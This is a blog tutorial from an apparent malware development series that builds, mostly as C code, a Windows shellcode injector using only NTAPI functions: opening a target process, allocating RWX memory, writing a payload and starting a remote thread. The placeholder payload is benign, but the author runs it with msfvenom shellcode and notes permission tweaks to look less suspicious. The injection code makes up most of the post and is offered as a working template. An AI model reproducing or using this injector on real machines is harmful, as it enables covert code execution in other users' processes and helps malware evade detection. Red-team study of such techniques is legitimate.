Complete NTAPI Implementation

July 10th, 2023

Table of Contents

Foreword

There's a video to go along with this blog post! Check it out here, or better yet, view the entire malware development series so far:

Overview

This is a continuation of the single-function replacement using NTDLL example. All that's different between this example and the single function example is that I used all of the WIN32 API's lower-level NTAPI counterparts. See the shellcode injection flow charts below:

OpenProcess() or CreateProcess() ---> VirtualAllocEx() ---> WriteProcessMemory() ---> CreateRemoteThreadEx()

NtOpenProcess() or NtCreateProcess() ---> NtAllocateVirtualMemory() ---> NtWriteVirtualMemory() ---> NtCreateThreadEx()

Prerequisites

Before setting up our program to use all of these functions, we need to do a bit of extra setup since the NTDLL/NTAPI functions require a bit more work to get working. I'll create a new header file that'll house all my macros and structures called glassBox.h. Here are all of the necessary structures we need to add.

glassBox.h

#pragma once
#pragma comment(lib, "ntdll")

#include <Windows.h>
#include <stdio.h>

/*----------[MACROS]----------*/
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define okay(msg, ...) printf("[+] " msg "\n", ##__VA_ARGS__)
#define info(msg, ...) printf("[i] " msg "\n", ##__VA_ARGS__)
#define warn(msg, ...) printf("[!] " msg "\n", ##__VA_ARGS__)

/*----------[STRUCTS]---------*/
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG              Length;
    HANDLE             RootDirectory;
    PUNICODE_STRING    ObjectName;
    ULONG              Attributes;
    PVOID              SecurityDescriptor;
    PVOID              SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

typedef struct _CLIENT_ID {
    PVOID              UniqueProcess;
    PVOID              UniqueThread;
} CLIENT_ID, * PCLIENT_ID;

Undocumented Kernel Structures

Where do we get these structures? Where the hell do they even come from, I hear you asking. Well, if we take a look at a function like NtOpenProcess, for example, we can see that it requires the following:

We see our typical parameters, like the ProcessHandle and DesiredAccess, but what about these two new parameters: ObjectAttributes (_OBJECT_ATTRIBUTES) and ClientId (_CLIENT_ID)? These are actually some undocumented structures that our function requires, which is why the above setup was required. We've covered this briefly in the last blog post, so this shouldn't be very alien to you. Using a website that documents tons of these structures; like the one down below, we can easily incorporate these into our programs.

So, all we know so far (if we didn't see the setup code in the prerequisites section) is that we need two structures, ObjectAttributes and ClientId, so, let's go find them from this site!

If you weren't aware of your Windows build or version, you could run the following command in a command prompt: winver

Right, we know our Windows build/version, let's proceed. Our build of Windows is newer than the latest build documented on this site, but for our purposes, it should be fine. Although, we'll also delve into how you can manually dump these structures later. Once we're in the right section, we can search for the structure we're interested in. The first structure needed for us in the case of NtOpenProcess is ObjectAttributes; which from the "POBJECT_ATTRIBUTES" parameter, let's us infer the structure name of _OBJECT_ATTRIBUTES. Since the "P" in front of the OBJECT_ATTRIBUTES denotes a pointer to this structure. Therefore, we know that the structure's name is OBJECT_ATTRIBUTES! Let's search for that:

We can click on this, and see what it shows:

There we go! We have all this juicy information that's required for our program. Let's copy that structure and define it within our program:

typedef struct _OBJECT_ATTRIBUTES {
    ULONG              Length;
    HANDLE             RootDirectory;
    PUNICODE_STRING    ObjectName;
    ULONG              Attributes;
    PVOID              SecurityDescriptor;
    PVOID              SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

With the _OBJECT_ATTRIBUTES structure defined, let's move on to the next one needed by NtOpenProcess, _CLIENT_ID.

Nice. Let's define this in our program as well:

typedef struct _CLIENT_ID {
    PVOID              UniqueProcess;
    PVOID              UniqueThread;
} CLIENT_ID, * PCLIENT_ID;

That's the required structures for NtOpenProcess()!

Please also remember that VERGILIUS, as great as it is, isn't the ONLY resource that can help you find structures like this. You can do some more searching to find things similar, and we'll be discussing how to dump these structures soon. For example, as we talked about in the last blog post, you can use the sites below this hint for your purposes.

We're almost done. All that's left is to discuss that _UNICODE_STRING structure:

typedef struct _UNICODE_STRING{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

Where does this come from? With the other two structures, their origin makes some sense since a function we're trying to use requires them. However, this structure seems like it came totally out of left field. Well, if you're vigilant, you'll actually notice that the answer was right before our eyes this entire time. Take a look at the _OBJECT_ATTRIBUTES structure once more, and see if you can understand where the above structure is actually required:

Remember, your functions aren't the only things that require structures. Sometimes, your structures may need structures. This is definitely the case with the _OBJECT_ATTRIBUTES structure since it's pointing to the _UNICODE_STRING structure for the ObjectName parameter.

So, because of this, we need to set up the _UNICODE_STRING structure for our _OBJECT_ATTRIBUTES structure. With all of the groundwork done, let's discuss how we might be able to dump these structures manually.

Dumping Kernel Structures

We've previously consulted VERGILIUS to incorporate the required structures needed for our program to work. But, it's more beneficial to learn how the process (or at least, a process) of dumping these structures manually works. Let's take the _UNICODE_STRING and _CLIENT_ID structures for example. Using a debugger like WinDbg, we can dump structure names like this:

dt nt!_UNICODE_STRING

As we can see, we've dumped the structure, and it's showing us the same thing that a site like VERGILIUS would:

//0x8 bytes (sizeof)
struct _UNICODE_STRING
{
    USHORT Length;                                                          //0x0
    USHORT MaximumLength;                                                   //0x2
    WCHAR* Buffer;                                                          //0x4
};

It's the same thing for the _CLIENT_ID structure as well:

And again, we'd get the same results from something like VERGILIUS:

//0x8 bytes (sizeof)
struct _CLIENT_ID
{
    VOID* UniqueProcess;                                                    //0x0
    VOID* UniqueThread;                                                     //0x4
};

Hopefully, that gives you an idea of one of the ways how these undocumented kernel structures are dumped. Now, with all of the structures defined, and ready to be used, let's move on to actually making the rest of the program. Oh, one last thing; don't let the name "kernel structures" fool you, they can 100% be used in user mode as well. Matter of fact, that's exactly what we're doing here as well.

Making the Program

Phew, the structures! We're finally on our way to performing shellcode injection purely through NTDLL/NTAPI! Firstly, we must define prototypes for the functions that we're eventually going to use. If you remember the flow path for NTAPI process injection, it follows something along these lines:

NtOpenProcess() or NtCreateProcess()        /* attach to, or create a process */
                |
                |
                |
     NtAllocateVirtualMemory()     /* allocate a buffer to the process memory */
                |
                |
                |
        NtWriteVirtualMemory() /* write your payload to that allocated buffer */
                |
                |
                |  
        NtCreateThreadEx()             /* create a thread to run your payload */

The question now arises, where can we find the prototypes for these functions such that we may be able to incorporate them? There are various ways for us to do this. One of my favourite ways is by consulting the Process Hacker Native API (PHNT) files:

This repository actually houses the NTAPI-specific functions/structures that the System Informer project uses. It's a really useful repository for us since it has NTAPI functions and Kernel structures present within it. Since we're going to get a handle on a process, let's look for NtOpenProcess:

Again, like the thing with the VERGILIUS project, the site above isn't the only way to find information on undocumented NTDLL functions. Don't solely rely on one resource, because as you'll see, sometimes (especially for those of you using NTINTERNALS, there may be a function that's on one resource, but not on another. So, make sure to do your due diligence as well.

Let's take a look at one function, before rinsing and repeating for the rest of them. Let's start with something like NtOpenProcess:

With that syntax above, we can incorporate this into our glassBox.h header file like this:

/*---------[FUNCS]---------*/
typedef NTSTATUS(NTAPI* NtOpenProcess)(
    _Out_ PHANDLE ProcessHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_opt_ PCLIENT_ID ClientId
);

And now, we've successfully created a prototype for our NtOpenProcess function. Now, let's do it for the rest of them (NtAllocateVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx). It all goes smoothly up until we get to NtCreateThreadEx:

So, like we've been doing, let's include this structure as well, and all other structures that PS_ATTRIBUTE_LIST might need itself into our glassBox.h file. After doing that, we can see that our header file now looks like this:

With the header file done, we can start building out the main injection program like we've been doing this entire time. We've already covered how to do most of these steps in the last blog post so I'll program out what we should know by now before coming to the individual functions.

#include "glassBox.h"

/*-----------[GETMOD]-----------*/
HMODULE getMod(LPCWSTR modName) {

    HMODULE hModule = NULL;
    info("trying to get a handle to %S", modName);

    hModule = GetModuleHandleW(modName);

    if (hModule == NULL) {
        warn("failed to get a handle to the module. error: 0x%lx\n", GetLastError());
        return NULL;
    }

    else {
        okay("got a handle to the module!");
        info("\\___[ %S\n\t\\_0x%p]\n", modName, hModule);
        return hModule;
    }

}

int main(int argc, char* argv[]) {
    
    /*-----------[SETUP/INIT]-----------*/
    NTSTATUS          status;
    DWORD             PID          = NULL;
    PVOID             rBuffer      = NULL;
    HANDLE            hProcess     = NULL;
    HANDLE            hThread      = NULL;
    HMODULE           hNTDLL       = NULL;

    unsigned char     crowPuke[]   = "\x90\x90\x90\x90\xcc";
    size_t            crowPukeSize = sizeof(crowPuke);
    size_t            bytesWritten = 0;

    if (argc < 2) {
        warn("usage: %s <PID>", argv[0]);
        return EXIT_FAILURE;
    }

    PID = atoi(argv[1]);

    OBJECT_ATTRIBUTES OA           = { sizeof(OA), NULL };
    CLIENT_ID         CID          = { (HANDLE)PID, NULL };

    hNTDLL = getMod(L"NTDLL");
    
    if (hNTDLL == NULL) {
        warn("unable to get a handle to NTDLL, error: 0x%lx", GetLastError());
        goto CLEANUP;
    }

    /* we are here */    
    info("populating function prototypes");
    
    info("cleaning up now");
    goto CLEANUP;

CLEANUP:

    if (hThread) {
        info("closing handle to thread");
        CloseHandle(hThread);
    }
    if (hProcess) {
        info("closing handle to process");
        CloseHandle(hProcess);
    }
 
    okay("finished with the cleanup, exiting now. goodbye :>");
    return EXIT_SUCCESS;

}

By this point, you should be somewhat familiar with what's happening here (if not, go back to the beginning of the process injection series). Firstly, we start off by defining this STATUS_SUCCESS which is only going to be used for one portion of our code; more specifically, in regard to error handling, which we'll see soon. Let's take a look at the structures that we're initializing:

/* initialize the _CLIENT_ID & _OBJECT_ATTRIBUTES kernel structures */
    PID = atoi(argv[1]);
    OBJECT_ATTRIBUTES OA           = { sizeof(OA), NULL };
    CLIENT_ID         CID          = { (HANDLE)PID, NULL };

It's important to note that, you can do this in multiple ways. The general idea is that we're trying to submit a PID to the UniqueProcess member of the _CLIENT_ID structure, which we've assigned to CID. You could also supply it like this:

/* like this */
CLIENT_ID CID = { (HANDLE)atoi(argv[1]), NULL};

/* or like this, etc. etc. */
CLIENT_ID CID = { 0 };
CID.UniqueProcess = PID;

I'm showing you all of these ways because I feel like sometimes we get too caught up in what we see from others and forget to experiment. So, yeah, there are a ton of ways to things, and you shouldn't take someone's code as gospel; including mine. Oh, please. Especially not mine. Anyways, let's continue to the next structure. We're assigning the first part of it: Length with the size of the _OBJECT_ATTRIBUTES structure itself. Then, we're initializing the rest of the structure by making it NULL. Now, this should be good to go. We can begin by populating our function prototypes with the actual addresses of the functions from within NTDLL:

    /*-----------[FUNC PROTOTYPES]-----------*/
    NtOpenProcess kawOpenProcess = (NtOpenProcess)GetProcAddress(hNTDLL, "NtOpenProcess");
    okay("got NtOpenProcess!");
    info("\\___[ NtOpenProcess\n\t| kawCreateThread\n\t|_0x%p]\n", kawOpenProcess);
    NtAllocateVirtualMemory kawAllocateVirtualMemory = (NtAllocateVirtualMemory)GetProcAddress(hNTDLL, "NtAllocateVirtualMemory");
    okay("got NtWriteVirtualMemory!");
    info("\\___[ NtAllocateVirtualMemory\n\t| kawAllocateVirtualMemory\n\t|_0x%p]\n", kawAllocateVirtualMemory);
    NtWriteVirtualMemory kawWriteVirtualMemory = (NtWriteVirtualMemory)GetProcAddress(hNTDLL, "NtWriteVirtualMemory");
    okay("got NtWriteVirtualMemory!");
    info("\\___[ NtWriteVirtualMemory\n\t| kawWriteVirtualMemory\n\t|_0x%p]\n", kawWriteVirtualMemory);
    NtCreateThreadEx kawCreateThreadEx = (NtCreateThreadEx)GetProcAddress(hNTDLL, "NtCreateThreadEx");
    okay("got NtCreateThreadEx!");
    info("\\___[ NtCreateThreadEx\n\t| kawCreateThreadEx\n\t|_0x%p]\n", kawCreateThreadEx);
    okay("all function prototypes filled!");

This might look a bit crazy, but the bulk of this is just "pretty" formatting for the functions we get. As you can see, we're reaching into the NTDLL module, looking at the address of the function correlated to our function prototype. After that, we print out the address of it for some debugging purposes. We can get a sneak peek as to what this will look like below:

After we populate all of our function prototypes, we can now finally begin with programming the actual injection portion of our program.

Making the Program (Cont.)

If we remember from the previous blog, NTAPI functions return NTSTATUS codes. So, we need to make sure that we keep this in mind when programming out these functions. Let's start by getting a handle on our target process with NtOpenProcess:

    /*-----------[INJECTION]-----------*/
    info("getting a handle to the process (%ld)", PID);
    status = kawOpenProcess(...);

The first parameter, ProcessHandle, is a pointer to the process handle variable we've declared - so, let's set this to &hProcess:

    status = kawOpenProcess(&hProcess, ...);

The next parameter, DesiredAccess, is the access rights we want to have for our process once we've gotten a handle to it, in this case, we'll do PROCESS_ALL_ACCESS.

    status = kawOpenProcess(&hProcess, PROCESS_ALL_ACCESS, ...);

The third parameter, ObjectAttributes, is a pointer to that OBJECT_ATTRIBUTES structure we set up at the start of our program. We've called it OA, so let's supply this:

    status = kawOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &OA, ...);

The last parameter, ClientId, is an optional input type and it's a pointer to the CLIENT_ID structure we set up at the start of our program. We've called it CID, so let's supply this:

    status = kawOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &OA, &CID);

With this done, we can now check the return value of this function to see if it's STATUS_SUCCESS indicating that our function ran successfully:

    if (status != STATUS_SUCCESS) {
        warn("failed to get a handle to the process, error: 0x%x", status);
        goto CLEANUP;
    }

Next, we have to allocate a region of memory to the process with NtAllocateVirtualMemory. So, as we did with NtOpenProcess, let's go over the parameters one-by-one.

    status = kawAllocateVirtualMemory(...);

The first parameter, ProcessHandle is our process handle.

    status = kawAllocateVirtualMemory(hProcess, ...);

The next parameter, BaseAddress, is a pointer the buffer itself, in this case, it'll be rBuffer.

    status = kawAllocateVirtualMemory(hProcess, &rBuffer, ...);

The next parameter, ZeroBits isn't important for us, so, we'll just set this to NULL.

    status = kawAllocateVirtualMemory(hProcess, &rBuffer, NULL, ...);

Next up is RegionSize and it's a pointer to the size of our shellcode, crowPukeSize. So, let's include this:

    status = kawAllocateVirtualMemory(hProcess, &rBuffer, NULL, &crowPukeSize, ...);

Now, we have to set the allocation type of our allocated buffer. We want to reserve and commit the region, so we'll supply MEM_COMMIT | MEM_RESERVE.

    status = kawAllocateVirtualMemory(hProcess, &rBuffer, NULL, &crowPukeSize, (MEM_COMMIT | MEM_RESERVE), ...);

Okay, cool. Now, it's time for the permissions of this region, Protect. We'll just set this to RWX but you can 100% use VirtualProtect's NTAPI equivalent to change the permissions so it's less suspicious; from RW to RX. However, for now, we'll just keep it simple.

    status = kawAllocateVirtualMemory(hProcess, &rBuffer, NULL, &crowPukeSize, (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE);

    if (status != STATUS_SUCCESS) {
        warn("failed allocate buffer in process memory, error: 0x%x", status);
        goto CLEANUP;
    }

    okay("allocated a region of %zu-bytes with PAGE_EXECUTE_READWRITE permissions", crowPukeSize);

You could try to implement a function/macro that will handle all of these status-return if-checks, I just got lazy so I'm going to be copy-pasting this segment for each of the NTAPI functions that we end up using.

With our buffer allocated, we can now write to that page. So, with NtWriteVirtualMemory, let's go ahead and do that.

    status = kawWriteVirtualMemory(...);

The first parameter, ProcessHandle, is... well, you know by now.

    status = kawWriteVirtualMemory(hProcess, ...);

Next, we have the BaseAddress which is the freshly-created page that we just set up; for this, we'll supply rBuffer.

    status = kawWriteVirtualMemory(hProcess, rBuffer, ...);

Then, we can supply in our payload for the Buffer parameter, since it's what we're actually trying to write to the page:

    status = kawWriteVirtualMemory(hProcess, rBuffer, crowPuke, ...);

Next up, we have BufferSize, this is the size of our payload - crowPukeSize:

    status = kawWriteVirtualMemory(hProcess, rBuffer, crowPuke, sizeof(crowPuke), ...);

Lastly, we have a pointer to the number of bytes written. We don't need this, but I like to include it for the sake of verbosity.

 status = kawWriteVirtualMemory(hProcess, rBuffer, crowPuke, sizeof(crowPuke), &bytesWritten);

    if (status != STATUS_SUCCESS) {
        warn("failed to write to allocated buffer, error: 0x%x", status);
        goto CLEANUP;
    }
    
    okay("wrote %zu-bytes to allocated buffer", bytesWritten);

I won't cover NtCreateThreadEx in this blog post because we already covered it in the last one where we replaced a single Win32 API function with its NTAPI counterpart. You can find that here:

Performing the Injection

With that done, all we have to do is wait for the thread to finish (or you don't have to, I guess; do whatever you want):

    okay("got a handle to the thread!");
    info("\\___[ hThread\n\t\\_0x%p]\n", hThread);

    info("waiting for thread to finish...");
    WaitForSingleObject(hThread, INFINITE);
    okay("thread finished execution!"); 
    
    info("cleaning up now");
    goto CLEANUP;

CLEANUP:

    if (hThread) {
        info("closing handle to thread");
        CloseHandle(hThread);
    }
    if (hProcess) {
        info("closing handle to process");
        CloseHandle(hProcess);
    }

    okay("finished with the cleanup, exiting now. goodbye :>");
    return EXIT_SUCCESS;

}

You can find the completed source code for this down below or in the GitHub repository for this malware development series.

Finally, we can now perform the injection. Running this against a process like mspaint.exe, we can see that this works beautifully. I'm using a calculator POC shellcode from msfvenom:

With that done, we've completely injected a target process using solely the NTAPI counterparts of the Win32 API functions. Well, we still used some functions from Kernel32 like WaitForSingleObject and CloseHandle, but you get what I mean. In the next blog post, we'll take a look at using system calls directly to perform an injection - which is the natural next step up from this technique.

Acknowledgements

Thank you pseudo and Man in the Purple Tux for making me realize that this blog post (before now), was sort of lacklustre, and was missing some key information. As well as me using the wrong parameters in the prototype for NtOpenProcess. I must've been hammered, sleep-deprived, or both. I appreciate you guys, and I hope this update gives you everything you were looking for. Also, if this code looks nothing like my previous code, it's because I've rewritten it from scratch whilst following my previous code. I've learned a lot since then, . Thank you to my incredible friend, 5pider for introducing me to some cool programming tips as well for this specific post. Till next time, keep on hackin'. See ya!